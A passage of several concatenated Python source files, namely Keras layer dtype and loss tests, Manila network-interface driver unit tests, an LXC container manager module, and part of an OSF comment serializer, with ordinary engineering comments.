          self.add_loss(math_ops.reduce_sum(inputs))
        return inputs

      def compute_output_shape(self, input_shape):
        return input_shape

    inputs = input_layer.Input((3,))
    layer = MyLayer()
    outputs = layer(inputs)
    model = training_lib.Model(inputs, outputs)
    model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
    loss = model.train_on_batch(np.ones((2, 3)), np.ones((2, 3)))
    self.assertEqual(loss, 2 * 3)

  def test_conditional_callable_losses(self):
    model = sequential.Sequential([
        layers.Dense(
            1, kernel_regularizer=regularizers.l2(1e-4), input_shape=(1,))
    ])
    model._run_eagerly = testing_utils.should_run_eagerly()

    def assert_graph(t):
      # In graph mode, the loss tensor must belong to the default graph.
      if not context.executing_eagerly():
        self.assertEqual(t.graph, ops.get_default_graph())

    @def_function.function
    def get_losses(t):
      if t < 0:
        return math_ops.reduce_sum(model.losses) * t
      else:
        return math_ops.reduce_sum(model.losses)

    assert_graph(get_losses(constant_op.constant(2.)))
    assert_graph(get_losses(constant_op.constant(0.5)))

  def test_conditional_metrics_in_call(self):

    class MyLayer(base_layer.Layer):

      def __init__(self):
        super(MyLayer,
              self).__init__(dynamic=testing_utils.should_run_eagerly())

      def call(self, inputs, training=None):
        if training:
          self.add_metric(math_ops.reduce_sum(inputs),
                          name='sum',
                          aggregation='mean')
        return inputs

      def compute_output_shape(self, input_shape):
        return input_shape

    inputs = input_layer.Input((3,))
    layer = MyLayer()
    outputs = layer(inputs)
    model = training_lib.Model(inputs, outputs)
    model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
    history = model.fit(np.ones((2, 3)), np.ones((2, 3)))
    self.assertEqual(history.history['sum'][-1], 2 * 3)

  def test_conditional_activity_regularizer_in_call(self):
    # A data-dependent branch around an activity-regularized layer works in
    # eager/dynamic mode, but graph mode raises InaccessibleTensorError.

    class TestModel(training_lib.Model):

      def __init__(self):
        super(TestModel, self).__init__(
            name='test_model', dynamic=testing_utils.should_run_eagerly())
        self.layer = layers.Dense(2, activity_regularizer='l2')

      def call(self, x, training=None):
        # Both branches call the same layer; the data-dependent condition is
        # what triggers the graph-mode failure.
        if math_ops.greater(math_ops.reduce_sum(x), 0.0):
          return self.layer(x)
        else:
          return self.layer(x)

    model = TestModel()
    model.compile(
        loss='mse',
        optimizer='sgd',
        run_eagerly=testing_utils.should_run_eagerly())

    x = np.ones(shape=(10, 1))
    y = np.ones(shape=(10, 2))

    if testing_utils.should_run_eagerly():
      model.fit(x, y, epochs=2, batch_size=5)
    else:
      with self.assertRaisesRegexp(errors_impl.InaccessibleTensorError,
                                   'ActivityRegularizer'):
        model.fit(x, y, epochs=2, batch_size=5)

  def test_conditional_activity_regularizer_with_wrappers_in_call(self):
    # Same as above, with the regularized layer wrapped in TimeDistributed.

    class TestModel(training_lib.Model):

      def __init__(self):
        super(TestModel, self).__init__(
            name='test_model', dynamic=testing_utils.should_run_eagerly())
        self.layer = layers.TimeDistributed(
            layers.Dense(2, activity_regularizer='l2'), input_shape=(3, 4))

      def call(self, x, training=None):
        if math_ops.greater(math_ops.reduce_sum(x), 0.0):
          return self.layer(x)
        else:
          return self.layer(x)

    model = TestModel()
    model.compile(
        loss='mse',
        optimizer='sgd',
        run_eagerly=testing_utils.should_run_eagerly())

    x = np.ones(shape=(10, 3, 4))
    y = np.ones(shape=(10, 3, 2))

    if testing_utils.should_run_eagerly():
      model.fit(x, y, epochs=2, batch_size=5)
    else:
      with self.assertRaisesRegexp(errors_impl.InaccessibleTensorError,
                                   'ActivityRegularizer'):
        model.fit(x, y, epochs=2, batch_size=5)
class AddLayer(base_layer.Layer):
  """A layer which adds its input to a scalar variable.

  Useful for testing a layer with a variable.
  """

  def build(self, _):
    # Single scalar weight initialized to one.
    self.v = self.add_weight('v', (), initializer='ones')
    self.built = True

  def call(self, inputs):
    return inputs + self.v
class IdentityLayer(base_layer.Layer):
  """A layer that returns its input unchanged.

  Useful for testing a layer without a variable.
  """

  def call(self, inputs):
    return inputs
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
class DTypeTest(keras_parameterized.TestCase):
  # This class only has tests relating to layer.dtype. Tests for dtype policies
  # are in mixed_precision/experimental/keras_test.py

  # TODO(reedwm): Maybe have a separate test file for input casting tests.

  def _const(self, dtype):
    """Returns a scalar constant of the given dtype."""
    return array_ops.constant(1, dtype=dtype)

  @testing_utils.enable_v2_dtype_behavior
  def test_dtype_defaults_to_floatx(self):
    layer = AddLayer()
    self.assertEqual(layer.dtype, 'float32')
    layer(self._const('float64'))
    self.assertEqual(layer.dtype, 'float32')  # dtype should not change

    try:
      backend.set_floatx('float64')
      layer = AddLayer()
      self.assertEqual(layer.dtype, 'float64')
    finally:
      # Always restore the global floatx for subsequent tests.
      backend.set_floatx('float32')

  @testing_utils.enable_v2_dtype_behavior
  def test_passing_dtype_to_constructor(self):
    layer = IdentityLayer(dtype='float64')
    layer(self._const('float32'))
    self.assertEqual(layer.dtype, 'float64')

    layer = IdentityLayer(dtype='int32')
    layer(self._const('float32'))
    self.assertEqual(layer.dtype, 'int32')

    layer = IdentityLayer(dtype=dtypes.float64)
    layer(self._const('float32'))
    self.assertEqual(layer.dtype, 'float64')

  @testing_utils.enable_v2_dtype_behavior
  def test_input_cast_to_dtype(self):
    # Bug fix: this method was named `input_cast_to_dtype`, so unittest
    # discovery silently skipped it; renamed with the `test_` prefix so it
    # actually runs.
    layer = AddLayer()

    # Input should be cast to layer.dtype, so output should also be layer.dtype
    self.assertEqual(layer(self._const('float64')).dtype, 'float32')

    layer = AddLayer(dtype='float64')
    self.assertEqual(layer(self._const('float32')).dtype, 'float64')

    # Test inputs are not casted if layer.dtype is not floating-point
    layer = IdentityLayer(dtype='int32')
    self.assertEqual(layer(self._const('float64')).dtype, 'float64')

    # Test inputs are not casted if the inputs are not floating-point
    layer = IdentityLayer(dtype='float32')
    self.assertEqual(layer(self._const('int32')).dtype, 'int32')

    # Test Numpy arrays are casted
    layer = IdentityLayer(dtype='float64')
    self.assertEqual(layer(np.array(1, dtype='float32')).dtype, 'float64')

    # Test Python floats are casted
    layer = IdentityLayer(dtype='float64')
    self.assertEqual(layer(1.).dtype, 'float64')

  @testing_utils.enable_v2_dtype_behavior
  def test_multiple_inputs_cast_to_dtype(self):
    # Bug fix: this method was named `multiple_inputs_cast_to_dtype` and was
    # therefore never run; renamed with the `test_` prefix.

    class MultiIdentityLayer(base_layer.Layer):

      def call(self, inputs):
        return [array_ops.identity(x) for x in inputs]

    # Testing layer with default dtype of float32
    layer = MultiIdentityLayer()
    x, y = layer([self._const('float16'), self._const('float32')])
    self.assertEqual(x.dtype, 'float32')
    self.assertEqual(y.dtype, 'float32')

    # Test passing dtype to the constructor
    layer = MultiIdentityLayer(dtype='float64')
    x, y = layer([self._const('float16'), self._const('float32')])
    self.assertEqual(x.dtype, 'float64')
    self.assertEqual(y.dtype, 'float64')

    # Test several non-floating point types
    layer = MultiIdentityLayer(dtype='float64')
    # Bug fix: `self._constant` was a typo for `self._const` (this helper is
    # named `_const` above); it would have raised AttributeError.
    x, y, z, w = layer([self._const('float16'), self._const('bool'),
                        self._const('float64'), self._const('complex64')])
    self.assertEqual(x.dtype, 'float64')
    self.assertEqual(y.dtype, 'bool')
    self.assertEqual(z.dtype, 'float64')
    self.assertEqual(w.dtype, 'complex64')

  @testing_utils.enable_v2_dtype_behavior
  def test_extra_args_and_kwargs_not_casted(self):

    class IdentityLayerWithArgs(base_layer.Layer):

      def call(self, inputs, *args, **kwargs):
        return nest.flatten([inputs, args, kwargs])

    layer = IdentityLayerWithArgs(dtype='float64')
    x, y, z = layer(self._const('float16'), self._const('float16'),
                    kwarg=self._const('float16'))
    # Only the first positional `inputs` is cast; extra args/kwargs keep
    # their original dtype.
    self.assertEqual(x.dtype, 'float64')
    self.assertEqual(y.dtype, 'float16')
    self.assertEqual(z.dtype, 'float16')

  @testing_utils.enable_v2_dtype_behavior
  def test_layer_without_autocast(self):

    class IdentityLayerWithoutAutocast(IdentityLayer):

      def __init__(self, *args, **kwargs):
        kwargs['autocast'] = False
        super(IdentityLayerWithoutAutocast, self).__init__(*args, **kwargs)

    # With autocast disabled, inputs pass through without casting.
    layer = IdentityLayerWithoutAutocast(dtype='float64')
    self.assertEqual(layer(self._const('float32')).dtype, 'float32')

  @testing_utils.enable_v2_dtype_behavior
  def test_dtype_warnings(self):
    # Test a layer warns when it casts inputs.
    layer = IdentityLayer()
    with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
      layer(self._const('float64'))
      self.assertRegexpMatches(
          str(mock_warn.call_args),
          ".*from dtype float64 to the layer's dtype of float32.*"
          "The layer has dtype float32 because.*")

    # Test a layer does not warn a second time
    with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
      layer(self._const('float64'))
      mock_warn.assert_not_called()

    # Test a new layer can warn even if a different layer already warned
    layer = IdentityLayer()
    with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
      layer(self._const('float64'))
      self.assertRegexpMatches(
          str(mock_warn.call_args),
          ".*from dtype float64 to the layer's dtype of float32.*"
          "The layer has dtype float32 because.*")

    # Test a layer does not warn if a dtype is passed
    layer = IdentityLayer(dtype='float32')
    with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
      layer(self._const('float64'))
      mock_warn.assert_not_called()

    # Test a layer does not warn if a Policy is set:
    with policy.policy_scope('float32'):
      layer = IdentityLayer()
      with test.mock.patch.object(tf_logging, 'warn') as mock_warn:
        layer(self._const('float64'))
        mock_warn.assert_not_called()

  @testing_utils.enable_v2_dtype_behavior
  def test_compute_output_signature(self):

    class IdentityLayerWithOutputShape(IdentityLayer):

      def compute_output_shape(self, input_shape):
        return input_shape

    layer = IdentityLayerWithOutputShape(dtype='float64')
    output_signature = layer.compute_output_signature(
        tensor_spec.TensorSpec(shape=(), dtype='float32'))
    self.assertEqual(output_signature.shape, ())
    self.assertEqual(output_signature.dtype, 'float64')

  @testing_utils.enable_v2_dtype_behavior
  def test_composite_tensors_input_casting(self):
    sparse = sparse_tensor.SparseTensor(
        indices=array_ops.constant([[0, 1], [2, 3]], dtype='int64'),
        values=array_ops.constant([0., 1.], dtype='float32'),
        dense_shape=array_ops.constant([4, 4], dtype='int64'))
    ragged = ragged_tensor.RaggedTensor.from_row_splits(
        values=array_ops.constant([1., 2., 3.], dtype='float32'),
        row_splits=array_ops.constant([0, 2, 2, 3], dtype='int64'))

    layer = IdentityLayer(dtype='float16')
    layer._supports_ragged_inputs = True

    for x in sparse, ragged:
      self.assertEqual(x.dtype, 'float32')
      y = layer(x)
      # Values are cast while the composite tensor type is preserved.
      self.assertEqual(y.dtype, 'float16')
      self.assertEqual(type(x), type(y))

  def test_supports_ragged_inputs_attribute_error(self):
    with self.assertRaisesRegexp(ValueError,
                                 'does not support RaggedTensors'):
      ragged = ragged_tensor.RaggedTensor.from_row_splits(
          values=array_ops.constant([1., 2., 3.], dtype='float32'),
          row_splits=array_ops.constant([0, 2, 2, 3], dtype='int64'))
      model = sequential.Sequential([
          input_layer.InputLayer(input_shape=(None,), ragged=True),
          IdentityLayer()
      ])
      model.compile(rmsprop.RMSprop(0.001), loss='mse')
      model.train_on_batch(ragged)

  @testing_utils.enable_v2_dtype_behavior
  def test_passing_non_tensor(self):
    layer = IdentityLayer()
    x = object()
    y = layer(x)  # Layer should not cast 'x', as it's not a tensor
    self.assertIs(x, y)

  @testing_utils.disable_v2_dtype_behavior
  def test_v1_behavior(self):
    # Test dtype defaults to None and inferred from input
    layer = IdentityLayer()
    self.assertIsNone(layer.dtype)
    layer(self._const('float64'))
    self.assertEqual(layer.dtype, 'float64')

    # Test layer does not cast to dtype
    self.assertEqual(layer(self._const('float32')).dtype, 'float32')
if __name__ == '__main__':
  # Run the test suite with eager execution enabled (TF2-style default).
  ops.enable_eager_execution()
  test.main()
| |
# Copyright 2014 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from manila.network.linux import interface
from manila.network.linux import ip_lib
from manila import test
from manila.tests import conf_fixture
from manila import utils
class BaseChild(interface.LinuxInterfaceDriver):
    """Minimal concrete driver: implements the abstract hooks as no-ops."""

    def plug(*args):
        pass

    def unplug(*args):
        pass
# Static fixtures that mimic the Neutron-style port/subnet dicts consumed
# by the interface drivers under test.
FakeSubnet = {'cidr': '192.168.1.1/24'}

FakeAllocation = {
    'subnet': FakeSubnet,
    'ip_address': '192.168.1.2',
    'ip_version': 4,
}

FakePort = {
    'id': 'abcdef01-1234-5678-90ab-ba0987654321',
    'fixed_ips': [FakeAllocation],
    'device_id': 'cccccccc-cccc-cccc-cccc-cccccccccccc',
}
class TestBase(test.TestCase):
    """Shared fixture: patches ip_lib so no real netlink calls happen."""

    def setUp(self):
        super(TestBase, self).setUp()
        self.conf = conf_fixture.CONF
        self.conf.register_opts(interface.OPTS)
        # Replace IPDevice/IPWrapper and device_exists with mocks so the
        # drivers under test never touch the host's network stack.
        self.ip_dev_p = mock.patch.object(ip_lib, 'IPDevice')
        self.ip_dev = self.ip_dev_p.start()
        self.ip_p = mock.patch.object(ip_lib, 'IPWrapper')
        self.ip = self.ip_p.start()
        self.device_exists_p = mock.patch.object(ip_lib, 'device_exists')
        self.device_exists = self.device_exists_p.start()
        # Undo the patches even if a test fails mid-way.
        self.addCleanup(self.ip_dev_p.stop)
        self.addCleanup(self.ip_p.stop)
        self.addCleanup(self.device_exists_p.stop)
class TestABCDriver(TestBase):
    """Tests for behavior shared by all LinuxInterfaceDriver subclasses."""

    def test_verify_abs_class_has_abs_methods(self):
        # LinuxInterfaceDriver is abstract: a subclass that implements none
        # of the abstract methods must fail to instantiate with TypeError.

        class ICanNotBeInstancetiated(interface.LinuxInterfaceDriver):
            pass

        try:
            ICanNotBeInstancetiated()
        except TypeError:
            pass
        except Exception as e:
            self.fail("Unexpected exception thrown: '%s'" % six.text_type(e))
        else:
            self.fail("ExpectedException 'TypeError' not thrown.")

    def test_get_device_name(self):
        # Device name is 'tap' + a truncated port id.
        bc = BaseChild()
        device_name = bc.get_device_name(FakePort)
        self.assertEqual('tapabcdef01-12', device_name)

    def test_l3_init(self):
        # init_l3 should add the requested CIDR and delete any pre-existing
        # global address that is not in the requested list.
        addresses = [dict(ip_version=4, scope='global',
                          dynamic=False, cidr='172.16.77.240/24')]
        self.ip_dev().addr.list = mock.Mock(return_value=addresses)

        bc = BaseChild()
        ns = '12345678-1234-5678-90ab-ba0987654321'
        bc.init_l3('tap0', ['192.168.1.2/24'], namespace=ns)
        self.ip_dev.assert_has_calls(
            [mock.call('tap0', namespace=ns),
             mock.call().addr.list(scope='global', filters=['permanent']),
             mock.call().addr.add(4, '192.168.1.2/24', '192.168.1.255'),
             mock.call().addr.delete(4, '172.16.77.240/24')])
class TestOVSInterfaceDriver(TestBase):
    """Tests for the Open vSwitch interface driver."""

    def test_get_device_name(self):
        br = interface.OVSInterfaceDriver()
        device_name = br.get_device_name(FakePort)
        self.assertEqual('tapabcdef01-12', device_name)

    def test_plug_no_ns(self):
        self._test_plug()

    def test_plug_with_ns(self):
        self._test_plug(namespace='01234567-1234-1234-99')

    def test_plug_alt_bridge(self):
        self._test_plug(bridge='br-foo')

    def _test_plug(self, additional_expectation=None, bridge=None,
                   namespace=None):
        # Common body for the plug tests: only the bridge "exists", so the
        # driver must create the port; the exact ovs-vsctl command and the
        # IPWrapper call sequence are verified.
        if additional_expectation is None:
            additional_expectation = []
        if not bridge:
            bridge = 'br-int'

        def device_exists(dev, namespace=None):
            return dev == bridge

        vsctl_cmd = ['ovs-vsctl', '--', '--may-exist', 'add-port',
                     bridge, 'tap0', '--', 'set', 'Interface', 'tap0',
                     'type=internal', '--', 'set', 'Interface', 'tap0',
                     'external-ids:iface-id=port-1234', '--', 'set',
                     'Interface', 'tap0',
                     'external-ids:iface-status=active', '--', 'set',
                     'Interface', 'tap0',
                     'external-ids:attached-mac=aa:bb:cc:dd:ee:ff']
        with mock.patch.object(utils, 'execute') as execute:
            ovs = interface.OVSInterfaceDriver()
            self.device_exists.side_effect = device_exists
            ovs.plug('tap0',
                     'port-1234',
                     'aa:bb:cc:dd:ee:ff',
                     bridge=bridge,
                     namespace=namespace)
            execute.assert_called_once_with(*vsctl_cmd, run_as_root=True)

        # MAC is set first; namespace wiring only happens when requested;
        # the link is brought up last.
        expected = [mock.call(),
                    mock.call().device('tap0'),
                    mock.call().device().link.set_address('aa:bb:cc:dd:ee:ff')]
        expected.extend(additional_expectation)
        if namespace:
            expected.extend(
                [mock.call().ensure_namespace(namespace),
                 mock.call().ensure_namespace().add_device_to_namespace(
                     mock.ANY)])
        expected.extend([mock.call().device().link.set_up()])
        self.ip.assert_has_calls(expected)

    def test_unplug(self, bridge=None):
        if not bridge:
            bridge = 'br-int'
        with mock.patch('manila.network.linux.ovs_lib.OVSBridge') as ovs_br:
            ovs = interface.OVSInterfaceDriver()
            ovs.unplug('tap0')
            ovs_br.assert_has_calls([mock.call(bridge),
                                     mock.call().delete_port('tap0')])
class TestBridgeInterfaceDriver(TestBase):
    """Tests for the Linux bridge (veth-based) interface driver."""

    def test_get_device_name(self):
        br = interface.BridgeInterfaceDriver()
        device_name = br.get_device_name(FakePort)
        self.assertEqual('ns-abcdef01-12', device_name)

    def test_plug_no_ns(self):
        self._test_plug()

    def test_plug_with_ns(self):
        self._test_plug(namespace='01234567-1234-1234-99')

    def _test_plug(self, namespace=None, mtu=None):
        # Common body: the driver should create a veth pair, set the MAC on
        # the namespace end, and bring both ends up.
        def device_exists(device, root_helper=None, namespace=None):
            return device.startswith('brq')

        root_veth = mock.Mock()
        ns_veth = mock.Mock()
        self.ip().add_veth = mock.Mock(return_value=(root_veth, ns_veth))

        self.device_exists.side_effect = device_exists
        br = interface.BridgeInterfaceDriver()
        mac_address = 'aa:bb:cc:dd:ee:ff'
        br.plug('ns-0',
                'port-1234',
                mac_address,
                namespace=namespace)

        ip_calls = [mock.call(),
                    mock.call().add_veth('tap0', 'ns-0', namespace2=namespace)]
        ns_veth.assert_has_calls([mock.call.link.set_address(mac_address)])

        self.ip.assert_has_calls(ip_calls)

        root_veth.assert_has_calls([mock.call.link.set_up()])
        ns_veth.assert_has_calls([mock.call.link.set_up()])

    def test_plug_dev_exists(self):
        self.device_exists.return_value = True
        with mock.patch('manila.network.linux.interface.LOG.warning') as log:
            br = interface.BridgeInterfaceDriver()
            # Bug fix: the device name and port id were passed swapped
            # ('port-1234', 'tap0'); plug() takes (device_name, port_id,
            # mac) as used in _test_plug above. The mocked device_exists
            # made the test pass either way, hiding the mistake.
            br.plug('tap0',
                    'port-1234',
                    'aa:bb:cc:dd:ee:ff')
            # The device already exists, so no IPDevice work and one warning.
            self.ip_dev.assert_has_calls([])
            self.assertEqual(1, log.call_count)

    def test_unplug_no_device(self):
        # Deleting a missing device raises RuntimeError inside unplug; the
        # driver should swallow it and log exactly one error.
        self.device_exists.return_value = False
        self.ip_dev().link.delete.side_effect = RuntimeError
        with mock.patch('manila.network.linux.interface.LOG') as log:
            br = interface.BridgeInterfaceDriver()
            br.unplug('tap0')
            # NOTE(review): the next line is a bare expression, not an
            # assertion -- it appears to be a leftover intended for
            # self.ip_dev.assert_has_calls([...]). Kept as-is because the
            # intended call list conflicts with test_unplug below
            # (mock.call('tap0', None)); verify against unplug()'s
            # implementation before wiring it in.
            [mock.call(), mock.call('tap0'), mock.call().link.delete()]
            self.assertEqual(1, log.error.call_count)

    def test_unplug(self):
        self.device_exists.return_value = True
        with mock.patch('manila.network.linux.interface.LOG.debug') as log:
            br = interface.BridgeInterfaceDriver()
            br.unplug('tap0')
            self.assertTrue(log.called)
        self.ip_dev.assert_has_calls([mock.call('tap0', None),
                                      mock.call().link.delete()])
| |
import os
from .service import LXCService
from .overlayutils import OverlayGroup
from . import constants
from .meta import LXCMeta
class LXCAlreadyStarted(Exception):
    """Raised when attempting to start a container that is already running."""

    def __init__(self, name):
        super(LXCAlreadyStarted, self).__init__(
            'LXC named "%s" is already running' % name)
class LXCDoesNotExist(Exception):
    """Raised when the named container cannot be found."""

    def __init__(self, name):
        super(LXCDoesNotExist, self).__init__(
            'LXC named "%s" does not exist' % name)
class LXCHasNoMeta(Exception):
    """Raised when metadata is requested from a container with none bound."""

    def __init__(self, name):
        super(LXCHasNoMeta, self).__init__(
            'LXC named "%s" has no BoundLXCMeta' % name)
class UnknownLXCType(Exception):
    """Raised when metadata names an LXC type with no registered class."""
def create_lxc(name, template='ubuntu', service=None):
    """Create a plain LXC and attach freshly saved 'LXC'-typed metadata.

    Falls back to the default LXCService when no service is supplied.
    """
    backing_service = service or LXCService
    backing_service.create(name, template=template)
    new_meta = LXCMeta(initial=dict(type='LXC'))
    return LXC.with_meta(name, backing_service, new_meta, save=True)
class LXC(object):
    """The standard LXC, backed by a service object that runs lxc commands."""

    @classmethod
    def with_meta(cls, name, service, meta, save=False):
        """Build an instance and immediately bind *meta* to it."""
        instance = cls(name, service)
        instance.bind_meta(meta, save=save)
        return instance

    @classmethod
    def from_meta(cls, name, service, meta):
        """Recreate an instance from previously stored metadata."""
        return cls.with_meta(name, service, meta)

    def __init__(self, name, service):
        self.name = name
        self._service = service
        self._meta = None

    def start(self):
        """Start this LXC; refuse when it is already running."""
        if self.status == 'RUNNING':
            raise LXCAlreadyStarted(self.name)
        self._service.start(self.name)

    def stop(self):
        """Stop this LXC."""
        self._service.stop(self.name)

    def destroy(self):
        """Remove this LXC via the backing service."""
        self._service.destroy(self.name)

    @property
    def status(self):
        """State string reported by the service (e.g. 'RUNNING')."""
        return self._service.info(self.name)['state']

    @property
    def pid(self):
        """PID of the container's init process, as an int."""
        return int(self._service.info(self.name)['pid'])

    def path(self, *join_paths):
        """Path to this LXC's directory, optionally joined with more parts."""
        return self._service.lxc_path(self.name, *join_paths)

    def __repr__(self):
        return '<%s "%s">' % (self.__class__.__name__, self.name)

    @property
    def meta(self):
        """Bound metadata; raises LXCHasNoMeta when nothing is bound."""
        bound = self._meta
        if not bound:
            raise LXCHasNoMeta(self.name)
        return bound

    def bind_meta(self, meta, save=False):
        """Attach *meta* to this LXC, optionally persisting it right away."""
        self._meta = meta.bind_and_save(self) if save else meta.bind(self)
def create_lxc_with_overlays(name, base, overlays, overlay_temp_path=None,
                             service=None):
    """Create an LXC whose filesystem overlays an existing base container.

    This is fast compared to a regular create because no container data is
    actually copied -- the new container is an overlay view of *base*.
    """
    backing_service = service or LXCService
    # At least one overlay layer is required.
    if not overlays:
        raise TypeError("Argument 'overlays' must have at least one item")
    # Resolve the base and target container directories under the system's
    # LXC path.
    lxc_root = backing_service.lxc_path()
    base_path = os.path.join(lxc_root, base)
    new_path = os.path.join(lxc_root, name)
    if not os.path.exists(new_path):
        os.mkdir(new_path)
    overlay_group = OverlayGroup.create(new_path, base_path, overlays)
    meta = LXCMeta(initial=dict(type='LXCWithOverlays',
                                overlay_group=overlay_group.meta()))
    return LXCWithOverlays.with_meta(name, backing_service, meta,
                                     overlay_group, save=True)
class UnmanagedLXCError(Exception):
    """Raised when an operation on an unmanaged LXC is refused."""
    pass
class UnmanagedLXC(LXC):
    """An LXC that was created without lxc4u metadata"""

    def destroy(self, force=False):
        """UnmanagedLXC Destructor.

        Refuses to run unless *force* is True, because destroying a
        container lxc4u does not manage may misbehave.

        :raises UnmanagedLXCError: when called without force=True.
        """
        if not force:
            raise UnmanagedLXCError('Destroying an unmanaged LXC might not '
                    'work. To continue please call this method with force=True')
        super(UnmanagedLXC, self).destroy()
class LXCWithOverlays(LXC):
    """An LXC that has an overlay group"""

    @classmethod
    def with_meta(cls, name, service, meta, overlay_group, save=False):
        """Build an instance and bind (optionally persist) its metadata."""
        lxc = cls(name, service, overlay_group)
        lxc.bind_meta(meta, save=save)
        return lxc

    @classmethod
    def from_meta(cls, name, service, meta):
        """Reconstruct the container and its overlay group from metadata."""
        overlay_group_meta = meta.get('overlay_group')
        overlay_group = OverlayGroup.from_meta(overlay_group_meta)
        return cls.with_meta(name, service, meta, overlay_group)

    def __init__(self, name, service, overlay_group):
        self._overlay_group = overlay_group
        super(LXCWithOverlays, self).__init__(name, service)

    def destroy(self):
        """Unmounts overlay and deletes its own directory"""
        # NOTE(review): unlike the base class, this never calls
        # service.destroy(); teardown is delegated to the overlay group.
        self._overlay_group.destroy()

    def top_overlay(self):
        """Returns top overlay from the overlay group"""
        return self._overlay_group.top()
class LXCLoader(object):
    """Instantiates the correct LXC subclass from stored metadata."""

    def __init__(self, types, service):
        # Mapping of type name -> LXC class used by load().
        self._types = types
        self._service = service

    def load(self, name, meta):
        """Create an LXC object of the type recorded in *meta*.

        :raises UnknownLXCType: if the metadata names an unregistered type.
        """
        lxc_type_name = meta.get('type', constants.DEFAULT_LXC_TYPE_KEY)
        lxc_type_cls = self._types.get(lxc_type_name)
        if not lxc_type_cls:
            raise UnknownLXCType('LXC type "%s" is unknown' % lxc_type_name)
        return lxc_type_cls.from_meta(name, self._service, meta)
class LXCManager(object):
    """Manages the currently available LXCs"""

    def __init__(self, loader, service):
        self._service = service
        self._loader = loader

    def list(self):
        """Gets all of the LXC's and creates objects for them."""
        # Idiom: comprehension instead of manual append loop.
        return [self.get(name) for name in self._service.list_names()]

    def get(self, name):
        """Retrieves a single LXC by name, loading its stored metadata."""
        lxc_meta_path = self._service.lxc_path(name,
                                               constants.LXC_META_FILENAME)
        meta = LXCMeta.load_from_file(lxc_meta_path)
        return self._loader.load(name, meta)
| |
import bleach
from rest_framework import serializers as ser
from modularodm import Q
from osf.exceptions import ValidationError as ModelValidationError
from framework.auth.core import Auth
from framework.exceptions import PermissionsError
from framework.guid.model import Guid
from website.files.models import StoredFileNode
from website.project.model import Comment
from rest_framework.exceptions import ValidationError, PermissionDenied
from api.base.exceptions import InvalidModelValueError, Conflict
from api.base.utils import absolute_reverse
from api.base.settings import osf_settings
from api.base.serializers import (JSONAPISerializer,
TargetField,
RelationshipField,
IDField, TypeField, LinksField,
AuthorizedCharField, DateByVersion,)
from website.project.spam.model import SpamStatus
class CommentReport(object):
    """Plain value object describing one user's abuse report on a comment."""

    def __init__(self, user_id, category, text):
        # The reporting user's id doubles as the report's id.
        self._id = user_id
        self.category = category
        self.text = text
class CommentSerializer(JSONAPISerializer):
    """JSON-API serializer for comments.

    Exposes comment content, target/user relationships, spam-status flags
    and permission helpers. Node/registration subclasses add the
    relationship fields for their resource type.
    """

    # Fields the API accepts in filter[...] query parameters.
    filterable_fields = frozenset([
        'deleted',
        'date_created',
        'date_modified',
        'page',
        'target'
    ])

    id = IDField(source='_id', read_only=True)
    type = TypeField()
    # AuthorizedCharField enforces read permission on access.
    content = AuthorizedCharField(source='get_content', required=True)
    page = ser.CharField(read_only=True)
    target = TargetField(link_type='related', meta={'type': 'get_target_type'})
    user = RelationshipField(related_view='users:user-detail', related_view_kwargs={'user_id': '<user._id>'})
    reports = RelationshipField(related_view='comments:comment-reports', related_view_kwargs={'comment_id': '<_id>'})
    date_created = DateByVersion(read_only=True)
    date_modified = DateByVersion(read_only=True)
    modified = ser.BooleanField(read_only=True, default=False)
    deleted = ser.BooleanField(read_only=True, source='is_deleted', default=False)
    is_abuse = ser.SerializerMethodField(help_text='If the comment has been reported or confirmed.')
    is_ham = ser.SerializerMethodField(help_text='Comment has been confirmed as ham.')
    has_report = ser.SerializerMethodField(help_text='If the user reported this comment.')
    has_children = ser.SerializerMethodField(help_text='Whether this comment has any replies.')
    can_edit = ser.SerializerMethodField(help_text='Whether the current user can edit this comment.')

    # LinksField.to_representation adds link to "self"
    links = LinksField({})

    class Meta:
        type_ = 'comments'

    def get_is_ham(self, obj):
        # True only when spam status was explicitly confirmed as HAM.
        if obj.spam_status == SpamStatus.HAM:
            return True
        return False

    def get_has_report(self, obj):
        """Whether the requesting user has an active (non-retracted) report."""
        user = self.context['request'].user
        if user.is_anonymous():
            return False
        # A missing 'retracted' key defaults to True, i.e. counts as retracted.
        return user._id in obj.reports and not obj.reports[user._id].get('retracted', True)

    def get_is_abuse(self, obj):
        # Both a pending flag and confirmed spam count as abuse.
        if obj.spam_status == SpamStatus.FLAGGED or obj.spam_status == SpamStatus.SPAM:
            return True
        return False

    def get_can_edit(self, obj):
        """Only the comment's author with comment permission may edit."""
        user = self.context['request'].user
        if user.is_anonymous():
            return False
        return obj.user._id == user._id and obj.node.can_comment(Auth(user))

    def get_has_children(self, obj):
        # A reply is any comment whose target guid is this comment.
        return Comment.find(Q('target', 'eq', Guid.load(obj._id))).count() > 0

    def get_absolute_url(self, obj):
        return absolute_reverse('comments:comment-detail', kwargs={
            'comment_id': obj._id,
            'version': self.context['request'].parser_context['kwargs']['version']
        })

    def update(self, comment, validated_data):
        """Apply delete/undelete or content edits to an existing comment.

        :raises PermissionDenied: when the user lacks the needed permission.
        :raises ValidationError: when the edited content fails model validation.
        """
        assert isinstance(comment, Comment), 'comment must be a Comment'
        auth = Auth(self.context['request'].user)
        if validated_data:
            if validated_data.get('is_deleted', None) is False and comment.is_deleted:
                try:
                    comment.undelete(auth, save=True)
                except PermissionsError:
                    raise PermissionDenied('Not authorized to undelete this comment.')
            elif validated_data.get('is_deleted', None) is True and not comment.is_deleted:
                try:
                    comment.delete(auth, save=True)
                except PermissionsError:
                    raise PermissionDenied('Not authorized to delete this comment.')
            elif 'get_content' in validated_data:
                content = validated_data.pop('get_content')
                try:
                    comment.edit(content, auth=auth, save=True)
                except PermissionsError:
